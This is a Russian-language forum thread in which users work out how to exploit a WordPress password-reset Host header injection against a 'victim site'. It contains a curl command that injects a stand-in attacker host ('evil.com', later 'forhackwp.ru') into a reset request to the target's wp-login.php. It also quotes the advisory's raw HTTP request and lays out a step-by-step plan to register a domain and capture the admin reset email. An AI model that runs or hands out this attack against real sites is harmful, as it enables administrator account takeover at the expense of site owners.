![]() |
Всем привет.
Подскажите как воспользоваться уязвимостью Wordpress, описанной здесь: https://wpvulndb.com/vulnerabilities/8807 я так понимаю, что это: curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword Команда для терминала в линукс? Что должно быть вместо evil.com ? вместо example.com сайт жертвы? или наоборот? Разъясните пожалуйста. |
Всё верно. Команда вводится в терминал Linux, example.com - сайт жертвы. А вот что это за хост evil.com....
В хелпе curl сказано: -H, --header LINE Передача пользовательского заголовка LINE на сервер (H) |
Цитата:
Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки? |
Цитата:
Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь. |
Цитата:
Цитата:
|
работа по ру запрещена)
|
Цитата:
|
Цитата:
|
Цитата:
Вот здесь: https://exploitbox.io/vuln/WordPress...2017-8295.html Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com Вместо attackers-mxserver.com может быть любой другой домен. Но перед атакой получается мне нужно создать почту на домене. Порядок действий: 1. Регаю домен. Пусть будет forhackwp.ru 2. Делаю почту wordpress@forhackwp.ru 3. Запускаю Линукс. Пишу в терминал: curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword 4. Жду письма на свою почту: wordpress@forhackwp.ru ? Или нет? Вот тут: https://exploitbox.io/vuln/WordPress...2017-8295.html Написано (перевод): Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию установка, доступная IP-адрес (IP-основе виртуального хоста): -----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------ WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора. Из-за измененного заголовка узла имя_сервера будет присвоено значение имя хоста по выбору злоумышленника. В результате WordPress передаст следующие заголовки и текст сообщения электронной почты /usr/bin / обертка sendmail: ------[ полученная электронная почта ]----- Subject: [CompanyX WP] Password Reset Return-Path: From: WordPress Message-ID: X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Someone requested that the password be reset for the following account: http://companyX-wp/wp/wordpress/ Username: admin If this was a mistake, just ignore this email and nothing will happen. To reset your password, visit the following address: "]http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login =admin>[/URL] ------------------------------- Как сделать HTTP запрос? |
Цитата:
Цитата:
Так же, должны быть соблюдены условия для успешной эксплуатации. Цитата:
Цитата:
|
| Время: 17:11 |